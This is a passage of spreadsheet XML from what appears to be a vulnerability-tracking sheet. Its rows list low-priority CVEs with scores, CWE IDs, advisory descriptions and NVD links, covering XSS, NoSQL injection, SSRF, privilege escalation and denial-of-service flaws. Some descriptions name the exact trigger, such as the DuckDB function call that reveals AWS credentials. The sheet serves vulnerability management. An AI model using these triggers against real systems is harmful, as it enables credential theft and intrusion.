      </c>
      <c r="M1656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85484</t>
        </is>
      </c>
    </row>
    <row r="1657">
      <c r="A1657" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85485</t>
        </is>
      </c>
      <c r="C1657" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1657" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1657" s="5" t="inlineStr"/>
      <c r="F1657" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1657" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1657" s="5" t="inlineStr"/>
      <c r="I1657" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1657" s="5" t="inlineStr"/>
      <c r="K1657" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1657" s="5" t="inlineStr">
        <is>
          <t>HTML::FormHandler versions before 0.410002 for Perl render some error messages into HTML without escaping.
The Table form layout and the Bootstrap 2 and 3 wrappers splice each error string straight into the surrounding markup. Version 0.410000, the fix for CVE-2026-19872, escaped the equivalent values in the other layouts and wrappers, and 0.410002 extended that to these three.
Error messages that contain attacker-influenced content such as rejected field values could embed JavaScript in rendered pages.</t>
        </is>
      </c>
      <c r="M1657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85485</t>
        </is>
      </c>
    </row>
    <row r="1658">
      <c r="A1658" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85630</t>
        </is>
      </c>
      <c r="C1658" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1658" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1658" s="5" t="inlineStr"/>
      <c r="F1658" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1658" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1658" s="5" t="inlineStr"/>
      <c r="I1658" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1658" s="5" t="inlineStr"/>
      <c r="K1658" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1658" s="5" t="inlineStr">
        <is>
          <t>HTML::FormHandler versions before 0.410002 for Perl render field attributes into HTML without escaping using the process_attrs method.
Any application with fields or field labels where some attributes are built from data rather than literals allows attacker-influenced text in an attribute value that can override the field attributes or embed JavaScript in rendered pages.
For example, the RadioGroup widget uses the process_attrs method via the render_option and wrap_radio methods.</t>
        </is>
      </c>
      <c r="M1658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85630</t>
        </is>
      </c>
    </row>
    <row r="1659">
      <c r="A1659" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88023</t>
        </is>
      </c>
      <c r="C1659" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1659" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1659" s="5" t="inlineStr"/>
      <c r="F1659" s="5" t="inlineStr"/>
      <c r="G1659" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1659" s="5" t="inlineStr"/>
      <c r="I1659" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1659" s="5" t="inlineStr"/>
      <c r="K1659" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1659" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB PHP Library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M1659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88023</t>
        </is>
      </c>
    </row>
    <row r="1660">
      <c r="A1660" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88024</t>
        </is>
      </c>
      <c r="C1660" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1660" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1660" s="5" t="inlineStr"/>
      <c r="F1660" s="5" t="inlineStr"/>
      <c r="G1660" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1660" s="5" t="inlineStr"/>
      <c r="I1660" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1660" s="5" t="inlineStr"/>
      <c r="K1660" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1660" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB Rust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M1660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88024</t>
        </is>
      </c>
    </row>
    <row r="1661">
      <c r="A1661" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88025</t>
        </is>
      </c>
      <c r="C1661" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1661" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1661" s="5" t="inlineStr"/>
      <c r="F1661" s="5" t="inlineStr"/>
      <c r="G1661" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1661" s="5" t="inlineStr"/>
      <c r="I1661" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1661" s="5" t="inlineStr"/>
      <c r="K1661" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1661"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M1661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88025</t>
        </is>
      </c>
    </row>
    <row r="1662">
      <c r="A1662" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88029</t>
        </is>
      </c>
      <c r="C1662" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1662" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1662" s="5" t="inlineStr"/>
      <c r="F1662" s="5" t="inlineStr"/>
      <c r="G1662" s="5" t="inlineStr">
        <is>
          <t>python, mongodb</t>
        </is>
      </c>
      <c r="H1662" s="5" t="inlineStr"/>
      <c r="I1662" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1662" s="5" t="inlineStr"/>
      <c r="K1662" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1662" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB Python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M1662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88029</t>
        </is>
      </c>
    </row>
    <row r="1663">
      <c r="A1663" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88030</t>
        </is>
      </c>
      <c r="C1663" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1663" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1663" s="5" t="inlineStr"/>
      <c r="F1663" s="5" t="inlineStr"/>
      <c r="G1663" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1663" s="5" t="inlineStr"/>
      <c r="I1663" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1663" s="5" t="inlineStr"/>
      <c r="K1663" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1663" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB Ruby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M1663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88030</t>
        </is>
      </c>
    </row>
    <row r="1664">
      <c r="A1664" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88031</t>
        </is>
      </c>
      <c r="C1664" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1664" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1664" s="5" t="inlineStr"/>
      <c r="F1664" s="5" t="inlineStr"/>
      <c r="G1664" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1664" s="5" t="inlineStr"/>
      <c r="I1664" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1664" s="5" t="inlineStr"/>
      <c r="K1664" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1664" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB Go Driver can cause a caller-supplied structured file identifier to be interpreted as a query condition rather than as a literal identifier. An authenticated user who can influence the identifier passed by an affected application may cause all GridFS file chunks in the affected bucket to be removed, rendering stored file content unreadable.</t>
        </is>
      </c>
      <c r="M1664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88031</t>
        </is>
      </c>
    </row>
    <row r="1665">
      <c r="A1665" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88033</t>
        </is>
      </c>
      <c r="C1665" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1665" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1665" s="5" t="inlineStr"/>
      <c r="F1665" s="5" t="inlineStr"/>
      <c r="G1665" s="5" t="inlineStr">
        <is>
          <t>java, mongodb</t>
        </is>
      </c>
      <c r="H1665" s="5" t="inlineStr"/>
      <c r="I1665" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1665" s="5" t="inlineStr"/>
      <c r="K1665" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1665" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB Java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M1665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88033</t>
        </is>
      </c>
    </row>
    <row r="1666">
      <c r="A1666" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88034</t>
        </is>
      </c>
      <c r="C1666" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1666" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1666" s="5" t="inlineStr"/>
      <c r="F1666" s="5" t="inlineStr"/>
      <c r="G1666" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1666" s="5" t="inlineStr"/>
      <c r="I1666" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1666" s="5" t="inlineStr"/>
      <c r="K1666" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1666"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M1666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88034</t>
        </is>
      </c>
    </row>
    <row r="1667">
      <c r="A1667" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88036</t>
        </is>
      </c>
      <c r="C1667" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1667" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1667" s="5" t="inlineStr"/>
      <c r="F1667" s="5" t="inlineStr"/>
      <c r="G1667" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1667" s="5" t="inlineStr"/>
      <c r="I1667" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1667" s="5" t="inlineStr"/>
      <c r="K1667" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1667"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M1667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88036</t>
        </is>
      </c>
    </row>
    <row r="1668">
      <c r="A1668" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1668" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-6717</t>
        </is>
      </c>
      <c r="C1668" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D1668" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1668" s="5" t="inlineStr"/>
      <c r="F1668" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1668" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1668" s="5" t="inlineStr"/>
      <c r="I1668" s="5" t="inlineStr">
        <is>
          <t>2024-04-25</t>
        </is>
      </c>
      <c r="J1668" s="5" t="inlineStr"/>
      <c r="K1668" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1668" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the SAML client registration in Keycloak that could allow an administrator to register malicious JavaScript URIs as Assertion Consumer Service POST Binding URLs (ACS), posing a Cross-Site Scripting (XSS) risk. This issue may allow a malicious admin in one realm or a client with registration access to target users in different realms or applications, executing arbitrary JavaScript in their contexts upon form submission. This can enable unauthorized access and harmful actions, compromising the confidentiality, integrity, and availability of the complete KC instance.</t>
        </is>
      </c>
      <c r="M1668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-6717</t>
        </is>
      </c>
    </row>
    <row r="1669">
      <c r="A1669" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0294</t>
        </is>
      </c>
      <c r="C1669" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D1669" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1669" s="5" t="inlineStr"/>
      <c r="F1669" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1669" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, palo alto</t>
        </is>
      </c>
      <c r="H1669" s="5" t="inlineStr">
        <is>
          <t>apple:macos, microsoft:windows, paloaltonetworks:prisma_access_agent</t>
        </is>
      </c>
      <c r="I1669" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1669" s="5" t="inlineStr"/>
      <c r="K1669" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="L1669" s="5" t="inlineStr">
        <is>
          <t>A privilege escalation (PE) vulnerability in the Palo Alto Networks Prisma® Access Agent app on Windows and macOS devices enables a local user to execute code with elevated privileges. 
The Prisma Access Agent on Linux, iOS, Android, and ChromeOS is not affected.</t>
        </is>
      </c>
      <c r="M1669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0294</t>
        </is>
      </c>
    </row>
    <row r="1670">
      <c r="A1670" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58139</t>
        </is>
      </c>
      <c r="C1670" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D1670" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1670" s="5" t="inlineStr"/>
      <c r="F1670" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1670" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H1670" s="5" t="inlineStr"/>
      <c r="I1670" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1670" s="5" t="inlineStr"/>
      <c r="K1670" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1670" s="5" t="inlineStr">
        <is>
          <t>The DuckDB AWS extension for DuckDB contains a security policy bypass vulnerability that allows any database user with SQL execution permissions to extract plaintext AWS credentials by calling the load_aws_credentials function with the redact_secret parameter set to false, circumventing the database-wide allow_unredacted_secrets=false policy. Attackers can invoke this single function to retrieve the underlying AWS credential chain including access_key_id, secret_access_key, session_token, and region in plaintext, which are immediately valid against AWS APIs and particularly impactful in managed environments where pg_duckdb is preloaded and an AWS credential chain such as IMDSv2, IRSA, ECS task role, or EC2 instance role is reachable.</t>
        </is>
      </c>
      <c r="M1670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58139</t>
        </is>
      </c>
    </row>
    <row r="1671">
      <c r="A1671" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65985</t>
        </is>
      </c>
      <c r="C1671" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D1671" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1671" s="5" t="inlineStr"/>
      <c r="F1671" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1671" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1671" s="5" t="inlineStr"/>
      <c r="I1671" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1671" s="5" t="inlineStr"/>
      <c r="K1671" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1671" s="5" t="inlineStr">
        <is>
          <t>FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. In 1.3.2 and earlier, the device-webapi-request Socket.IO handler in server/runtime/index.js permits an authenticated non-admin runtime user to control property.address, causing the FUXA server to issue an outbound HTTP or HTTPS request and return the response body to the requesting socket. The attacker can use the server as a read SSRF oracle against reachable internal services or cloud metadata endpoints, with impact depending on the FUXA host's deployment network. This issue is fixed in version 1.3.3.</t>
        </is>
      </c>
      <c r="M1671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65985</t>
        </is>
      </c>
    </row>
    <row r="1672">
      <c r="A1672" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70603</t>
        </is>
      </c>
      <c r="C1672" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D1672" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1672" s="5" t="inlineStr"/>
      <c r="F1672" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1672" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1672" s="5" t="inlineStr"/>
      <c r="I1672" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1672" s="5" t="inlineStr"/>
      <c r="K1672" s="5" t="inlineStr">
        <is>
          <t>CWE-158, CWE-20</t>
        </is>
      </c>
      <c r="L1672" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.6, 40.9.0, 41.1.1, and 42.0.0-beta.1, shell.openPath() did not reject paths containing embedded null bytes. Apps that perform string-only validation of file paths, for example checking the file extension, before passing them to shell.openPath() could be bypassed, allowing an attacker-controlled path to open a different file than the one that passed validation. Apps are only affected if they pass paths derived from untrusted input to shell.openPath() and rely on string-based validation without a filesystem check. This issue is fixed in versions 39.8.6, 40.9.0, 41.1.1, and 42.0.0-beta.1.</t>
        </is>
      </c>
      <c r="M1672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70603</t>
        </is>
      </c>
    </row>
    <row r="1673">
      <c r="A1673" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78552</t>
        </is>
      </c>
      <c r="C1673" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D1673" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1673" s="5" t="inlineStr"/>
      <c r="F1673" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1673" s="5" t="inlineStr">
        <is>
          <t>nginx, okta</t>
        </is>
      </c>
      <c r="H1673" s="5" t="inlineStr"/>
      <c r="I1673" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1673" s="5" t="inlineStr"/>
      <c r="K1673" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L1673" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not apply its Lua directive restriction to the application-level custom configuration field. The field is interpolated directly into the nginx server block without inspection, resulting in execution of injected directives.</t>
        </is>
      </c>
      <c r="M1673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78552</t>
        </is>
      </c>
    </row>
    <row r="1674">
      <c r="A1674" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78622</t>
        </is>
      </c>
      <c r="C1674" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D1674" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1674" s="5" t="inlineStr"/>
      <c r="F1674" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1674" s="5" t="inlineStr">
        <is>
          <t>windows, okta</t>
        </is>
      </c>
      <c r="H1674" s="5" t="inlineStr"/>
      <c r="I1674" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1674" s="5" t="inlineStr"/>
      <c r="K1674" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L1674" s="5" t="inlineStr">
        <is>
          <t>The Okta Verify for Windows uninstaller does not verify whether the user data directory is a filesystem junction before deleting its contents with elevated privileges. The delete operation follows the junction target, resulting in recursive deletion of unintended directory contents.</t>
        </is>
      </c>
      <c r="M1674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78622</t>
        </is>
      </c>
    </row>
    <row r="1675">
      <c r="A1675" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79780</t>
        </is>
      </c>
      <c r="C1675" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D1675" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1675" s="5" t="inlineStr"/>
      <c r="F1675" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1675" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1675" s="5" t="inlineStr"/>
      <c r="I1675" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1675" s="5" t="inlineStr"/>
      <c r="K1675" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1675" s="5" t="inlineStr">
        <is>
          <t>rclone before v1.75.0 fails to sanitize IBM IAM bearer tokens and SSE-C encryption keys during S3 redirect callbacks, allowing credentials to be preserved across scheme or host changes. Attackers observing network traffic from a trusted endpoint can capture reusable IBM IAM tokens on same-host HTTPS-to-HTTP downgrades or SSE-C keys on cross-origin redirects to access protected S3 objects.</t>
        </is>
      </c>
      <c r="M1675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79780</t>
        </is>
      </c>
    </row>
    <row r="1676">
      <c r="A1676" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82056</t>
        </is>
      </c>
      <c r="C1676" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D1676" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1676" s="5" t="inlineStr"/>
      <c r="F1676" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1676" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1676" s="5" t="inlineStr"/>
      <c r="I1676" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1676" s="5" t="inlineStr"/>
      <c r="K1676" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1676" s="5" t="inlineStr">
        <is>
          <t>A race condition in MongoDB server's text index query parsing can cause a heap use-after-free read when handling upsert retry paths. Under certain concurrent index lifecycle operations, a raw pointer to internal text index metadata may be dereferenced after the underlying structures have been freed, leading to a server crash. An authenticated user with readWrite privileges can trigger this condition through specific concurrent text-search and index management operations, resulting in denial of service for all connected clients. This</t>
        </is>
      </c>
      <c r="M1676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82056</t>
        </is>
      </c>
    </row>
    <row r="1677">
      <c r="A1677" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82059</t>
        </is>
      </c>
      <c r="C1677" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D1677" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1677" s="5" t="inlineStr"/>
      <c r="F1677" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1677" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1677" s="5" t="inlineStr"/>
      <c r="I1677" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1677" s="5" t="inlineStr"/>
      <c r="K1677" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L1677" s="5" t="inlineStr">
        <is>
          <t>An internal aggregation expression in MongoDB Server was incorrectly registered as accessible to any authenticated user rather than being restricted to internal cluster operations. By crafting a malformed index specification within this expression, an authenticated user with read-only privileges could trigger an assertion failure in the index key generation code path. In certain build configurations, this assertion failure results in termination of the mongod process, causing a denial of service to all connected clients.</t>
        </is>
      </c>
      <c r="M1677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82059</t>
        </is>
      </c>
    </row>
    <row r="1678">
      <c r="A1678" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82063</t>
        </is>
      </c>
      <c r="C1678" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D1678" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1678" s="5" t="inlineStr"/>
      <c r="F1678" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1678" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1678" s="5" t="inlineStr"/>
      <c r="I1678" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1678" s="5" t="inlineStr"/>
      <c r="K1678" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1678" s="5" t="inlineStr">
        <is>
          <t>A use-after-free security issue in the cursor management component of MongoDB Server allows an authenticated user to cause a denial of service. Under specific timing conditions during cursor operations, a stale pointer to a freed resource may be retained and subsequently dereferenced during cursor cleanup, leading to a server process crash.</t>
        </is>
      </c>
      <c r="M1678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82063</t>
        </is>
      </c>
    </row>
    <row r="1679">
      <c r="A1679" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
